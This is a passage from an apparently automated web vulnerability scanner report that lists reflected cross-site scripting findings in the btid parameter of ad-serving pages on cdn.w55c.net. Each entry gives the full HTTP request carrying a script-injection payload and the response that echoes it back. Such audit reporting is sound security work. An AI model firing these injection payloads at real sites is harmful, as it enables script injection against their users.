P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 28 Feb 2011 21:20:22 GMT
Date: Sun, 24 Apr 2011 15:27:48 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1420

<IFRAME SRC="http://ad.doubleclick.net/adi/N4270.158901.DATAXU/B5279302.4;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUk
...[SNIP]...
270.158901.DATAXU/B5279302.4;abr=!ie;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz3e7c8"><script>alert(1)</script>b7455b3da66?">
...[SNIP]...

6.64. http://cdn.w55c.net/i/0RES95J3Zo_918427505.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RES95J3Zo_918427505.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc11f"><script>alert(1)</script>bc50ef3ac45 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RES95J3Zo_918427505.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=fc11f"><script>alert(1)</script>bc50ef3ac45&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAHP6EK5X5HHeFjM058SIacGTDQNRf0Tg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZNQXp6YTk2dA&ciu=MFJFUzk1SjNabw&reqid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=866&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516462&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516467&frm=1&adk=2614322350&ga_vid=1758961832.1303658516&ga_sid=1303658516&ga_hid=2008436335&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:18 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 28 Feb 2011 21:20:22 GMT
Date: Sun, 24 Apr 2011 14:52:24 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 876

<IFRAME SRC="http://ad.doubleclick.net/adi/N4270.158901.DATAXU/B5279302.4;sz=160x600;pc=[TPAS_ID];ord=fc11f"><script>alert(1)</script>bc50ef3ac45?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
...[SNIP]...

6.65. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0REyoPRMSz_696710848.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 987b4"><script>alert(1)</script>10957bb4bdf was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0REyoPRMSz_696710848.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8NDIwNDQw987b4"><script>alert(1)</script>10957bb4bdf&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_-gAOCYEK5XdQI_RaDCZm9H-nfhLkah7veg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=420&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676493&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658493907&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658493914&frm=1&adk=513358139&ga_vid=1738821208.1303658494&ga_sid=1303658494&ga_hid=1857389626&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:27:11 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Date: Sun, 24 Apr 2011 15:25:46 GMT
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:04:45 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 7133

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV
...[SNIP]...
553.158901.DATAXU/B4970757.16;abr=!ie;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEN8R0Zmd0tBcHhIeHwxMzAzNjU4NDkyOTk5fDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8NDIwNDQw987b4"><script>alert(1)</script>10957bb4bdf?">
...[SNIP]...

6.66. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0REyoPRMSz_696710848.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cfd2"><script>alert(1)</script>28ea52001bf was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0REyoPRMSz_696710848.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=7cfd2"><script>alert(1)</script>28ea52001bf&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbQ_-gAOCYEK5XdQI_RaDCZm9H-nfhLkah7veg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY2WXJBQmRPUA&ciu=MFJFeW9QUk1Teg&reqid=NERCNDNGRkEwMDBFMDk4MTBBRTU3NzUwMjNGNDVBMEM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=420&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676493&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658493907&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658493914&frm=1&adk=513358139&ga_vid=1738821208.1303658494&ga_sid=1303658494&ga_hid=1857389626&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:27:13 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Date: Sun, 24 Apr 2011 15:27:03 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 04 Apr 2011 01:04:45 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 6589

<IFRAME SRC="http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=7cfd2"><script>alert(1)</script>28ea52001bf?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
...[SNIP]...

6.67. http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RFFcWpaTN_954073853.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5a7d"><script>alert(1)</script>01f68b45030 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RFFcWpaTN_954073853.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2a5a7d"><script>alert(1)</script>01f68b45030&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAIEK0K5YNMOLob9Z6R4rJH8FZ3KUYu1A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZGeVp3NFpBSg&ciu=MFJGRmNXcGFUTg&reqid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=503&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516518&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516523&frm=1&adk=513358139&ga_vid=1030430259.1303658517&ga_sid=1303658517&ga_hid=340899808&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:22 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 15 Mar 2011 22:27:10 GMT
Date: Sun, 24 Apr 2011 15:15:35 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1344

<IFRAME SRC="http://ad.doubleclick.net/adi/N5315.158901.DATAXU/B5334493.10;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEV
...[SNIP]...
ck.net/adj/N5315.158901.DATAXU/B5334493.10;abr=!ie;sz=728x90;ord=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjV8R0Z1djIzNkVXbHwxMzAzNjU4NTE2OTM4fDF8MEZGeVp3NFpBSnwwUkZGY1dwYVROfEVYXzEwMjM0NzcyMDZ8NTAzNjI2a5a7d"><script>alert(1)</script>01f68b45030?">
...[SNIP]...

6.68. http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0RFFcWpaTN_954073853.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5787"><script>alert(1)</script>7759d110b5 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0RFFcWpaTN_954073853.html?rtbhost=rts-rr15.sldc.dataxu.net&btid=b5787"><script>alert(1)</script>7759d110b5&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAIEK0K5YNMOLob9Z6R4rJH8FZ3KUYu1A&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZGeVp3NFpBSg&ciu=MFJGRmNXcGFUTg&reqid=NERCNDQwMTEwMDA4MTBBRDBBRTU4MzRDMzhCQTFCRjU&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=503&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516518&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516523&frm=1&adk=513358139&ga_vid=1030430259.1303658517&ga_sid=1303658517&ga_hid=340899808&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 15:30:25 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Tue, 15 Mar 2011 22:27:10 GMT
Date: Sun, 24 Apr 2011 15:23:31 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 796

<IFRAME SRC="http://ad.doubleclick.net/adi/N5315.158901.DATAXU/B5334493.10;sz=728x90;ord=b5787"><script>alert(1)</script>7759d110b5?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
...[SNIP]...

6.69. http://cdn.w55c.net/i/0ROvzxEJNe_571009919.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0ROvzxEJNe_571009919.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f0483'><script>alert(1)</script>f8146e8c54f was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0ROvzxEJNe_571009919.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODJ8R0ZGdXp2Y2ttQnwxMzAzNjYxODcyNjkyfDF8MEZCWWt3ZjdTV3wwUk92enhFSk5lfEVYXzEwMjM0NzcyMDZ8NTcwMDA0f0483'><script>alert(1)</script>f8146e8c54f&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNLgAJ-Z4K5X1DKQVTggYCu04PFXSP5d7SLQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZCWWt3ZjdTVw&ciu=MFJPdnp4RUpOZQ&reqid=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=570&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679873&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661873586&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661873599&frm=1&adk=2614322350&ga_vid=1404053174.1303661874&ga_sid=1303661874&ga_hid=824907956&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=19
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:10:18 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:17:59 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 11 Apr 2011 17:52:03 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 463
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061007 (MII-APC/1.6)
Content-Length: 861

<iframe id='a3cde47f' name='a3cde47f' src='http://d.w55c.net/afr.php?zoneid=790&amp;cb=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODJ8R0ZGdXp2Y2ttQnwxMzAzNjYxODcyNjkyfDF8MEZCWWt3ZjdTV3wwUk92enhFSk5lfEVYX
...[SNIP]...
<a href='http://d.w55c.net/ck.php?n=a186394a&amp;cb=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODJ8R0ZGdXp2Y2ttQnwxMzAzNjYxODcyNjkyfDF8MEZCWWt3ZjdTV3wwUk92enhFSk5lfEVYXzEwMjM0NzcyMDZ8NTcwMDA0f0483'><script>alert(1)</script>f8146e8c54f' target='_blank'>
...[SNIP]...

6.70. http://cdn.w55c.net/i/0ROvzxEJNe_571009919.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0ROvzxEJNe_571009919.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 92db2'><script>alert(1)</script>2ac55c6fad6 was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0ROvzxEJNe_571009919.html?rtbhost=rts-rr10.sldc.dataxu.net&btid=92db2'><script>alert(1)</script>2ac55c6fad6&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRNLgAJ-Z4K5X1DKQVTggYCu04PFXSP5d7SLQ&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZCWWt3ZjdTVw&ciu=MFJPdnp4RUpOZQ&reqid=NERCNDREMkUwMDA5Rjk5RTBBRTU3RDQzMjkwNTUzODI&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=570&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php& HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679873&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661873586&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661873599&frm=1&adk=2614322350&ga_vid=1404053174.1303661874&ga_sid=1303661874&ga_hid=824907956&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=19
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchgoogle=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:10:18 GMT
Server: w55c.net
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Tue, 23-Apr-13 16:18:00 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Mon, 11 Apr 2011 17:52:03 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 464
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061005 (MII-APC/1.6)
Content-Length: 453

